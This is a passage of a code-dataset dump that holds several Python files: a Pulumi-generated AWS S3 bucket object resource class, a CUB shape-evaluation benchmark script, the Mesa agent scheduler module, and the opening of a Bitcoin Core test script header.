= None,\n key: Optional[pulumi.Input[str]] = None,\n kms_key_id: Optional[pulumi.Input[str]] = None,\n metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,\n object_lock_mode: Optional[pulumi.Input[str]] = None,\n object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,\n server_side_encryption: Optional[pulumi.Input[str]] = None,\n source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,\n source_hash: Optional[pulumi.Input[str]] = None,\n storage_class: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n website_redirect: Optional[pulumi.Input[str]] = None,\n __props__=None):\n if opts is None:\n opts = pulumi.ResourceOptions()\n if not isinstance(opts, pulumi.ResourceOptions):\n raise TypeError('Expected resource options to be a ResourceOptions instance')\n if opts.version is None:\n opts.version = _utilities.get_version()\n if opts.id is None:\n if __props__ is not None:\n raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')\n __props__ = BucketObjectArgs.__new__(BucketObjectArgs)\n\n __props__.__dict__[\"acl\"] = acl\n if bucket is None and not opts.urn:\n raise TypeError(\"Missing required property 'bucket'\")\n if bucket is not None and not opts.urn:\n warnings.warn(\"\"\"Use the aws_s3_object resource instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"bucket is deprecated: Use the aws_s3_object resource instead\"\"\")\n __props__.__dict__[\"bucket\"] = bucket\n __props__.__dict__[\"bucket_key_enabled\"] = bucket_key_enabled\n __props__.__dict__[\"cache_control\"] = cache_control\n __props__.__dict__[\"content\"] = content\n __props__.__dict__[\"content_base64\"] = content_base64\n __props__.__dict__[\"content_disposition\"] = content_disposition\n __props__.__dict__[\"content_encoding\"] = content_encoding\n __props__.__dict__[\"content_language\"] = content_language\n __props__.__dict__[\"content_type\"] = content_type\n __props__.__dict__[\"etag\"] = etag\n __props__.__dict__[\"force_destroy\"] = force_destroy\n if key is not None and not opts.urn:\n warnings.warn(\"\"\"Use the aws_s3_object resource instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"key is deprecated: Use the aws_s3_object resource instead\"\"\")\n __props__.__dict__[\"key\"] = key\n __props__.__dict__[\"kms_key_id\"] = kms_key_id\n __props__.__dict__[\"metadata\"] = metadata\n __props__.__dict__[\"object_lock_legal_hold_status\"] = object_lock_legal_hold_status\n __props__.__dict__[\"object_lock_mode\"] = object_lock_mode\n __props__.__dict__[\"object_lock_retain_until_date\"] = object_lock_retain_until_date\n __props__.__dict__[\"server_side_encryption\"] = server_side_encryption\n __props__.__dict__[\"source\"] = source\n __props__.__dict__[\"source_hash\"] = source_hash\n __props__.__dict__[\"storage_class\"] = storage_class\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"website_redirect\"] = website_redirect\n __props__.__dict__[\"tags_all\"] = None\n __props__.__dict__[\"version_id\"] = None\n super(BucketObject, __self__).__init__(\n 'aws:s3/bucketObject:BucketObject',\n resource_name,\n __props__,\n opts)\n\n @staticmethod\n def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n acl: Optional[pulumi.Input[str]] = None,\n bucket: Optional[pulumi.Input[str]] = None,\n bucket_key_enabled: Optional[pulumi.Input[bool]] = None,\n cache_control: Optional[pulumi.Input[str]] = None,\n content: Optional[pulumi.Input[str]] = None,\n content_base64: Optional[pulumi.Input[str]] = None,\n content_disposition: Optional[pulumi.Input[str]] = None,\n content_encoding: Optional[pulumi.Input[str]] = None,\n content_language: Optional[pulumi.Input[str]] = None,\n content_type: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n force_destroy: Optional[pulumi.Input[bool]] = None,\n key: Optional[pulumi.Input[str]] = None,\n kms_key_id: Optional[pulumi.Input[str]] = None,\n metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,\n object_lock_mode: Optional[pulumi.Input[str]] = None,\n object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,\n server_side_encryption: Optional[pulumi.Input[str]] = None,\n source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,\n source_hash: Optional[pulumi.Input[str]] = None,\n storage_class: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n version_id: Optional[pulumi.Input[str]] = None,\n website_redirect: Optional[pulumi.Input[str]] = None) -> 'BucketObject':\n \"\"\"\n Get an existing BucketObject resource's state with the given name, id, and optional extra\n properties used to qualify the lookup.\n\n :param str resource_name: The unique name of the resulting resource.\n :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] acl: [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n :param pulumi.Input[str] bucket: Name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n :param pulumi.Input[bool] bucket_key_enabled: Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n :param pulumi.Input[str] cache_control: Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n :param pulumi.Input[str] content: Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n :param pulumi.Input[str] content_base64: Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.\n :param pulumi.Input[str] content_disposition: Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n :param pulumi.Input[str] content_encoding: Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n :param pulumi.Input[str] content_language: Language the content is in e.g., en-US or en-GB.\n :param pulumi.Input[str] content_type: Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n :param pulumi.Input[str] etag: Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n :param pulumi.Input[bool] force_destroy: Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.\n :param pulumi.Input[str] key: Name of the object once it is in the bucket.\n :param pulumi.Input[str] kms_key_id: ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. This provider will only perform drift detection if a configuration value is provided.\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] metadata: Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n :param pulumi.Input[str] object_lock_legal_hold_status: [Legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n :param pulumi.Input[str] object_lock_mode: Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.\n :param pulumi.Input[str] object_lock_retain_until_date: Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n :param pulumi.Input[str] server_side_encryption: Server-side encryption of the object in S3. Valid values are \"`AES256`\" and \"`aws:kms`\".\n :param pulumi.Input[Union[pulumi.Asset, pulumi.Archive]] source: Path to a file that will be read and uploaded as raw bytes for the object content.\n :param pulumi.Input[str] source_hash: Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. (The value is only stored in state and not saved by AWS.)\n :param pulumi.Input[str] storage_class: [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Map of tags to assign to the object. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: Map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.\n :param pulumi.Input[str] version_id: Unique version ID value for the object, if bucket versioning is enabled.\n :param pulumi.Input[str] website_redirect: Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _BucketObjectState.__new__(_BucketObjectState)\n\n __props__.__dict__[\"acl\"] = acl\n __props__.__dict__[\"bucket\"] = bucket\n __props__.__dict__[\"bucket_key_enabled\"] = bucket_key_enabled\n __props__.__dict__[\"cache_control\"] = cache_control\n __props__.__dict__[\"content\"] = content\n __props__.__dict__[\"content_base64\"] = content_base64\n __props__.__dict__[\"content_disposition\"] = content_disposition\n __props__.__dict__[\"content_encoding\"] = content_encoding\n __props__.__dict__[\"content_language\"] = content_language\n __props__.__dict__[\"content_type\"] = content_type\n __props__.__dict__[\"etag\"] = etag\n __props__.__dict__[\"force_destroy\"] = force_destroy\n __props__.__dict__[\"key\"] = key\n __props__.__dict__[\"kms_key_id\"] = kms_key_id\n __props__.__dict__[\"metadata\"] = metadata\n __props__.__dict__[\"object_lock_legal_hold_status\"] = object_lock_legal_hold_status\n __props__.__dict__[\"object_lock_mode\"] = object_lock_mode\n __props__.__dict__[\"object_lock_retain_until_date\"] = object_lock_retain_until_date\n __props__.__dict__[\"server_side_encryption\"] = server_side_encryption\n __props__.__dict__[\"source\"] = source\n __props__.__dict__[\"source_hash\"] = source_hash\n __props__.__dict__[\"storage_class\"] = storage_class\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"tags_all\"] = tags_all\n __props__.__dict__[\"version_id\"] = version_id\n __props__.__dict__[\"website_redirect\"] = website_redirect\n return BucketObject(resource_name, opts=opts, __props__=__props__)\n\n @property\n @pulumi.getter\n def acl(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n \"\"\"\n return pulumi.get(self, \"acl\")\n\n @property\n @pulumi.getter\n def bucket(self) -> pulumi.Output[str]:\n \"\"\"\n Name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n \"\"\"\n return pulumi.get(self, \"bucket\")\n\n @property\n @pulumi.getter(name=\"bucketKeyEnabled\")\n def bucket_key_enabled(self) -> pulumi.Output[bool]:\n \"\"\"\n Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n \"\"\"\n return pulumi.get(self, \"bucket_key_enabled\")\n\n @property\n @pulumi.getter(name=\"cacheControl\")\n def cache_control(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n \"\"\"\n return pulumi.get(self, \"cache_control\")\n\n @property\n @pulumi.getter\n def content(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n \"\"\"\n return pulumi.get(self, \"content\")\n\n @property\n @pulumi.getter(name=\"contentBase64\")\n def content_base64(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.\n \"\"\"\n return pulumi.get(self, \"content_base64\")\n\n @property\n @pulumi.getter(name=\"contentDisposition\")\n def content_disposition(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n \"\"\"\n return pulumi.get(self, \"content_disposition\")\n\n @property\n @pulumi.getter(name=\"contentEncoding\")\n def content_encoding(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n \"\"\"\n return pulumi.get(self, \"content_encoding\")\n\n @property\n @pulumi.getter(name=\"contentLanguage\")\n def content_language(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Language the content is in e.g., en-US or en-GB.\n \"\"\"\n return pulumi.get(self, \"content_language\")\n\n @property\n @pulumi.getter(name=\"contentType\")\n def content_type(self) -> pulumi.Output[str]:\n \"\"\"\n Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n \"\"\"\n return pulumi.get(self, \"content_type\")\n\n @property\n @pulumi.getter\n def etag(self) -> pulumi.Output[str]:\n \"\"\"\n Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n \"\"\"\n return pulumi.get(self, \"etag\")\n\n @property\n @pulumi.getter(name=\"forceDestroy\")\n def force_destroy(self) -> pulumi.Output[Optional[bool]]:\n \"\"\"\n Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.\n \"\"\"\n return pulumi.get(self, \"force_destroy\")\n\n @property\n @pulumi.getter\n def key(self) -> pulumi.Output[str]:\n \"\"\"\n Name of the object once it is in the bucket.\n \"\"\"\n return pulumi.get(self, \"key\")\n\n @property\n @pulumi.getter(name=\"kmsKeyId\")\n def kms_key_id(self) -> pulumi.Output[str]:\n \"\"\"\n ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. This provider will only perform drift detection if a configuration value is provided.\n \"\"\"\n return pulumi.get(self, \"kms_key_id\")\n\n @property\n @pulumi.getter\n def metadata(self) -> pulumi.Output[Optional[Mapping[str, str]]]:\n \"\"\"\n Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n \"\"\"\n return pulumi.get(self, \"metadata\")\n\n @property\n @pulumi.getter(name=\"objectLockLegalHoldStatus\")\n def object_lock_legal_hold_status(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n [Legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n \"\"\"\n return pulumi.get(self, \"object_lock_legal_hold_status\")\n\n @property\n @pulumi.getter(name=\"objectLockMode\")\n def object_lock_mode(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.\n \"\"\"\n return pulumi.get(self, \"object_lock_mode\")\n\n @property\n @pulumi.getter(name=\"objectLockRetainUntilDate\")\n def object_lock_retain_until_date(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n \"\"\"\n return pulumi.get(self, \"object_lock_retain_until_date\")\n\n @property\n @pulumi.getter(name=\"serverSideEncryption\")\n def server_side_encryption(self) -> pulumi.Output[str]:\n \"\"\"\n Server-side encryption of the object in S3. Valid values are \"`AES256`\" and \"`aws:kms`\".\n \"\"\"\n return pulumi.get(self, \"server_side_encryption\")\n\n @property\n @pulumi.getter\n def source(self) -> pulumi.Output[Optional[Union[pulumi.Asset, pulumi.Archive]]]:\n \"\"\"\n Path to a file that will be read and uploaded as raw bytes for the object content.\n \"\"\"\n return pulumi.get(self, \"source\")\n\n @property\n @pulumi.getter(name=\"sourceHash\")\n def source_hash(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. (The value is only stored in state and not saved by AWS.)\n \"\"\"\n return pulumi.get(self, \"source_hash\")\n\n @property\n @pulumi.getter(name=\"storageClass\")\n def storage_class(self) -> pulumi.Output[str]:\n \"\"\"\n [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n \"\"\"\n return pulumi.get(self, \"storage_class\")\n\n @property\n @pulumi.getter\n def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:\n \"\"\"\n Map of tags to assign to the object. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n \"\"\"\n return pulumi.get(self, \"tags\")\n\n @property\n @pulumi.getter(name=\"tagsAll\")\n def tags_all(self) -> pulumi.Output[Mapping[str, str]]:\n \"\"\"\n Map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.\n \"\"\"\n return pulumi.get(self, \"tags_all\")\n\n @property\n @pulumi.getter(name=\"versionId\")\n def version_id(self) -> pulumi.Output[str]:\n \"\"\"\n Unique version ID value for the object, if bucket versioning is enabled.\n \"\"\"\n return pulumi.get(self, \"version_id\")\n\n @property\n @pulumi.getter(name=\"websiteRedirect\")\n def website_redirect(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n return pulumi.get(self, \"website_redirect\")\n\n"} {"ext": "py", "sha": "1a2f727f4d21c6fe544013e24ac6ab8313bb3b06", "content": "\"\"\"\nScript for testing on CUB.\n\nSample usage:\npython -m cmr.benchmark.evaluate --split val --name --num_train_epoch \n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl import app\nfrom absl import flags\nimport os\nimport os.path as osp\nimport numpy as np\nimport torch\nimport scipy.io as sio\n\nfrom ..nnutils import test_utils\nfrom ..data import cub as cub_data\nfrom ..nnutils import predictor as pred_utils\n\nflags.DEFINE_boolean('visualize', False, 'if true visualizes things')\n\nopts = flags.FLAGS\n\n\nclass ShapeTester(test_utils.Tester):\n def define_model(self):\n opts = self.opts\n\n self.predictor = pred_utils.MeshPredictor(opts)\n\n # for visualization\n self.renderer = self.predictor.vis_rend\n self.renderer.set_bgcolor([1., 1., 1.])\n self.renderer.renderer.renderer.renderer.image_size = 512\n self.renderer.set_light_dir([0, 1, -1], 0.38)\n\n def init_dataset(self):\n opts = self.opts\n self.data_module = cub_data\n\n torch.manual_seed(0)\n self.dataloader = self.data_module.data_loader(opts)\n\n def evaluate(self, outputs, batch):\n \"\"\"\n Compute IOU and keypoint error\n \"\"\"\n opts = self.opts\n bs = opts.batch_size\n\n ## compute iou\n mask_gt = batch['mask'].view(bs, -1).numpy()\n mask_pred = outputs['mask_pred'].cpu().view(bs, -1).type_as(\n batch['mask']).numpy()\n intersection = mask_gt * mask_pred\n union = mask_gt + mask_pred - intersection\n iou = intersection.sum(1) / union.sum(1)\n\n # Compute pck\n padding_frac = opts.padding_frac\n # The [-1,1] coordinate frame in which keypoints corresponds to:\n # (1+2*padding_frac)*max_bbox_dim in image coords\n # pt_norm = 2* (pt_img - trans)/((1+2*pf)*max_bbox_dim)\n # err_pt = 2*err_img/((1+2*pf)*max_bbox_dim)\n # err_pck_norm = err_img/max_bbox_dim = err_pt*(1+2*pf)/2\n # so the keypoint error in the canonical fram should be multiplied by:\n err_scaling = (1 + 2 * padding_frac) / 2.0\n kps_gt = batch['kp'].cpu().numpy()\n\n kps_vis = kps_gt[:, :, 2]\n kps_gt = kps_gt[:, :, 0:2]\n kps_pred = outputs['kp_pred'].cpu().type_as(batch['kp']).numpy()\n kps_err = kps_pred - kps_gt\n kps_err = np.sqrt(np.sum(kps_err * kps_err, axis=2)) * err_scaling\n\n return iou, kps_err, kps_vis\n\n def visualize(self, outputs, batch):\n vert = outputs['verts'][0]\n cam = outputs['cam_pred'][0]\n texture = outputs['texture'][0]\n\n img_pred = self.renderer(vert, cam, texture=texture)\n aroundz = []\n aroundy = []\n # for deg in np.arange(0, 180, 30):\n for deg in np.arange(0, 150, 30):\n rendz = self.renderer.diff_vp(\n vert, cam, angle=-deg, axis=[1, 0, 0], texture=texture)\n rendy = self.renderer.diff_vp(\n vert, cam, angle=deg, axis=[0, 1, 0], texture=texture)\n aroundz.append(rendz)\n aroundy.append(rendy)\n\n aroundz = np.hstack(aroundz)\n aroundy = np.hstack(aroundy)\n vps = np.vstack((aroundz, aroundy))\n\n img = np.transpose(convert2np(batch['img'][0]), (1, 2, 0))\n import matplotlib.pyplot as plt\n plt.ion()\n fig = plt.figure(1)\n ax = fig.add_subplot(121)\n ax.imshow(img)\n ax.set_title('input')\n ax.axis('off')\n ax = fig.add_subplot(122)\n ax.imshow(img_pred)\n ax.set_title('pred_texture')\n ax.axis('off')\n plt.draw()\n\n fig = plt.figure(2)\n plt.imshow(vps)\n plt.axis('off')\n plt.draw()\n plt.pause(0.01)\n import ipdb\n ipdb.set_trace()\n\n def test(self):\n opts = self.opts\n bench_stats = {'ious': [], 'kp_errs': [], 'kp_vis': []}\n\n if opts.ignore_pred_delta_v:\n result_path = osp.join(opts.results_dir, 'results_meanshape.mat')\n elif opts.use_sfm_ms:\n result_path = osp.join(opts.results_dir,\n 'results_sfm_meanshape.mat')\n else:\n result_path = osp.join(opts.results_dir, 'results.mat')\n\n if opts.use_sfm_camera:\n result_path = result_path.replace('.mat', '_sfm_camera.mat')\n\n print('Writing to %s' % result_path)\n\n if not osp.exists(result_path):\n\n n_iter = len(self.dataloader)\n for i, batch in enumerate(self.dataloader):\n if i % 100 == 0:\n print('{}/{} evaluation iterations.'.format(i, n_iter))\n if opts.max_eval_iter > 0 and (i >= opts.max_eval_iter):\n break\n outputs = self.predictor.predict(batch)\n if opts.visualize:\n self.visualize(outputs, batch)\n iou, kp_err, kp_vis = self.evaluate(outputs, batch)\n\n bench_stats['ious'].append(iou)\n bench_stats['kp_errs'].append(kp_err)\n bench_stats['kp_vis'].append(kp_vis)\n\n if opts.save_visuals and (i % opts.visuals_freq == 0):\n self.save_current_visuals(batch, outputs)\n\n bench_stats['kp_errs'] = np.concatenate(bench_stats['kp_errs'])\n bench_stats['kp_vis'] = np.concatenate(bench_stats['kp_vis'])\n\n bench_stats['ious'] = np.concatenate(bench_stats['ious'])\n sio.savemat(result_path, bench_stats)\n else:\n bench_stats = sio.loadmat(result_path)\n\n # Report numbers.\n\n mean_iou = bench_stats['ious'].mean()\n\n n_vis_p = np.sum(bench_stats['kp_vis'], axis=0)\n n_correct_p_pt1 = np.sum(\n (bench_stats['kp_errs'] < 0.1) * bench_stats['kp_vis'], axis=0)\n n_correct_p_pt15 = np.sum(\n (bench_stats['kp_errs'] < 0.15) * bench_stats['kp_vis'], axis=0)\n pck1 = (n_correct_p_pt1 / n_vis_p).mean()\n pck15 = (n_correct_p_pt15 / n_vis_p).mean()\n print('%s mean iou %.3g, pck.1 %.3g, pck.15 %.3g' %\n (osp.basename(result_path), mean_iou, pck1, pck15))\n\n\ndef main(_):\n opts.n_data_workers = 0\n opts.batch_size = 1\n\n opts.results_dir = osp.join(opts.results_dir_base, '%s' % (opts.split),\n opts.name, 'epoch_%d' % opts.num_train_epoch)\n if not osp.exists(opts.results_dir):\n print('writing to %s' % opts.results_dir)\n os.makedirs(opts.results_dir)\n\n torch.manual_seed(0)\n tester = ShapeTester(opts)\n tester.init_testing()\n tester.test()\n\n\nif __name__ == '__main__':\n app.run(main)\n"} {"ext": "py", "sha": "1a2f72f3f29a482fec7b6f6236c8c573a02a818b", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nMesa Time Module\n================\n\nObjects for handling the time component of a model. In particular, this module\ncontains Schedulers, which handle agent activation. A Scheduler is an object\nwhich controls when agents are called upon to act, and when.\n\nThe activation order can have a serious impact on model behavior, so it's\nimportant to specify it explicitly. Example simple activation regimes include\nactivating all agents in the same order every step, shuffling the activation\norder every time, activating each agent *on average* once per step, and more.\n\nKey concepts:\n Step: Many models advance in 'steps'. A step may involve the activation of\n all agents, or a random (or selected) subset of them. Each agent in turn\n may have their own step() method.\n\n Time: Some models may simulate a continuous 'clock' instead of discrete\n steps. However, by default, the Time is equal to the number of steps the\n model has taken.\n\n\nTODO: Have the schedulers use the model's randomizer, to keep random number\nseeds consistent and allow for replication.\n\n\"\"\"\nimport random\nfrom collections import OrderedDict\n\n\nclass BaseScheduler:\n \"\"\" Simplest scheduler; activates agents one at a time, in the order\n they were added.\n\n Assumes that each agent added has a *step* method which takes no arguments.\n\n (This is explicitly meant to replicate the scheduler in MASON).\n\n \"\"\"\n def __init__(self, model):\n \"\"\" Create a new, empty BaseScheduler. \"\"\"\n self.model = model\n self.steps = 0\n self.time = 0\n self._agents = OrderedDict()\n\n def add(self, agent):\n \"\"\" Add an Agent object to the schedule.\n\n Args:\n agent: An Agent to be added to the schedule. NOTE: The agent must\n have a step() method.\n\n \"\"\"\n self._agents[agent.unique_id] = agent\n\n def remove(self, agent):\n \"\"\" Remove all instances of a given agent from the schedule.\n\n Args:\n agent: An agent object.\n\n \"\"\"\n del self._agents[agent.unique_id]\n\n def step(self):\n \"\"\" Execute the step of all the agents, one at a time. \"\"\"\n agent_keys = list(self._agents.keys())\n for agent_key in agent_keys:\n self._agents[agent_key].step()\n self.steps += 1\n self.time += 1\n\n def get_agent_count(self):\n \"\"\" Returns the current number of agents in the queue. \"\"\"\n return len(self._agents.keys())\n\n @property\n def agents(self):\n return list(self._agents.values())\n\n\nclass RandomActivation(BaseScheduler):\n \"\"\" A scheduler which activates each agent once per step, in random order,\n with the order reshuffled every step.\n\n This is equivalent to the NetLogo 'ask agents...' and is generally the\n default behavior for an ABM.\n\n Assumes that all agents have a step(model) method.\n\n \"\"\"\n def step(self):\n \"\"\" Executes the step of all agents, one at a time, in\n random order.\n\n \"\"\"\n agent_keys = list(self._agents.keys())\n random.shuffle(agent_keys)\n\n for agent_key in agent_keys:\n self._agents[agent_key].step()\n self.steps += 1\n self.time += 1\n\n\nclass SimultaneousActivation(BaseScheduler):\n \"\"\" A scheduler to simulate the simultaneous activation of all the agents.\n\n This scheduler requires that each agent have two methods: step and advance.\n step() activates the agent and stages any necessary changes, but does not\n apply them yet. advance() then applies the changes.\n\n \"\"\"\n def step(self):\n \"\"\" Step all agents, then advance them. \"\"\"\n agent_keys = list(self._agents.keys())\n for agent_key in agent_keys:\n self._agents[agent_key].step()\n for agent_key in agent_keys:\n self._agents[agent_key].advance()\n self.steps += 1\n self.time += 1\n\n\nclass StagedActivation(BaseScheduler):\n \"\"\" A scheduler which allows agent activation to be divided into several\n stages instead of a single `step` method. All agents execute one stage\n before moving on to the next.\n\n Agents must have all the stage methods implemented. Stage methods take a\n model object as their only argument.\n\n This schedule tracks steps and time separately. Time advances in fractional\n increments of 1 / (# of stages), meaning that 1 step = 1 unit of time.\n\n \"\"\"\n def __init__(self, model, stage_list=None, shuffle=False,\n shuffle_between_stages=False):\n \"\"\" Create an empty Staged Activation schedule.\n\n Args:\n model: Model object associated with the schedule.\n stage_list: List of strings of names of stages to run, in the\n order to run them in.\n shuffle: If True, shuffle the order of agents each step.\n shuffle_between_stages: If True, shuffle the agents after each\n stage; otherwise, only shuffle at the start\n of each step.\n\n \"\"\"\n super().__init__(model)\n self.stage_list = [\"step\"] if not stage_list else stage_list\n self.shuffle = shuffle\n self.shuffle_between_stages = shuffle_between_stages\n self.stage_time = 1 / len(self.stage_list)\n\n def step(self):\n \"\"\" Executes all the stages for all agents. \"\"\"\n agent_keys = list(self._agents.keys())\n if self.shuffle:\n random.shuffle(agent_keys)\n for stage in self.stage_list:\n for agent_key in agent_keys:\n getattr(self._agents[agent_key], stage)() # Run stage\n if self.shuffle_between_stages:\n random.shuffle(agent_keys)\n self.time += self.stage_time\n\n self.steps += 1\n"} {"ext": "py", "sha": "1a2f7375731ff790c98d9989c7a03f71c3314ff6", "content": "#!/usr/bin/env python3\n# Copyright (c) 2015-2016 The Bitcoin Core developers\n# Distributed under the 